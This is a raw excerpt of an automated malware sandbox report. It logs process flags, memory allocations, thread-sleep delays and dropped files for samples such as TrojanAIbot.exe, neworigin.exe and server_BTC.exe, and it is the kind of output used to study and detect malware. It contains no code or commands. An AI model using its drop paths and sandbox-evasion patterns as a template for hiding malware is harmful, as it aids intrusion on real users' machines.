Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2F20000 memory commit 500006912
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2F21000 memory commit 500178944
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2F4D000 memory commit 500002816
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2F4E000 memory commit 500350976
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2FA4000 memory commit 501014528
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 309C000 memory commit 500006912
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 309E000 memory commit 500015104
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 2E40000 memory commit 500006912
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 2E41000 memory commit 500178944
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 2E6D000 memory commit 500002816
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 2E6E000 memory commit 500350976
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 2EC4000 memory commit 501014528
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 2FBC000 memory commit 500006912
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 2FBE000 memory commit 500015104
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2EE0000 memory commit 500006912
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2EE1000 memory commit 500178944
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2F0D000 memory commit 500002816
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2F0E000 memory commit 500350976
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2F64000 memory commit 501014528
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 305C000 memory commit 500006912
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 305E000 memory commit 500015104
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 1210000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 2D40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 4D40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 980000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 2360000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 4360000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 1470000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 3230000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 17D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: AF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 2780000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 4780000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 1160000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 2BA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 2AE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 1470000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 2DA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 4DA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 10F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 2D70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 2C90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 30B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 32F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 52F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 13E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 2F90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 4F90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199968
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199859
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199750
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199640
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199531
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199422
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199312
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199202
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 4765
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 1708
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7244
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Window / User API: threadDelayed 2893
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Window / User API: threadDelayed 6894
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 6957
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 2689
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 5196
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 4649
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Windows\SysWOW64\esentutl.exe Dropped PE file which has not been started: C:\Users\Public\xpha.pif
Source: C:\Users\Public\Libraries\Wisrysxl.PIF API coverage: 9.8 %
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3452 Thread sleep count: 4765 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -99792s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -99578s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -99227s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -99027s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -98915s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -98788s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -98667s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -98560s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -98454s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -98310s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -98167s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -97929s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -97796s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -97680s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -97578s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -97466s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -97349s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -97213s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -97089s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -96966s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3452 Thread sleep count: 1708 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -96808s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -96390s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -96268s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -96144s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -96020s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -95893s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -95765s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -95653s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -95542s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -95430s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -95320s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -95200s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -95087s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -94968s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -94853s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -94743s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -94634s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -94495s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -94377s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -94244s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -94113s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -93977s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -93660s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -93392s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -93166s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -99853s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -99688s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 5880 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8016 Thread sleep count: 7244 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1272 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8052 Thread sleep count: 33 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1360 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 3200 Thread sleep time: -173580000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 3200 Thread sleep time: -413640000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 2636 Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 1868 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep count: 36 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -33204139332677172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7460 Thread sleep count: 6957 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -99825s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -99378s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98963s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98847s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98718s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98603s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98484s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98353s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98220s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98089s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -97956s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -97754s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -97499s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -97358s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -97238s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -97100s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -96991s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -96789s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -96199s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95705s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95481s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95325s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95156s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94986s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94810s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94636s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94311s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94191s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94042s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -93915s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -93745s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -99852s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -99690s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -99555s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -99394s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -99226s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -99059s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98628s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98368s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98223s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -98056s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -97817s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -97245s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -97005s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -96861s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -96702s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7460 Thread sleep count: 2689 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -96591s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -96480s >= -30000s
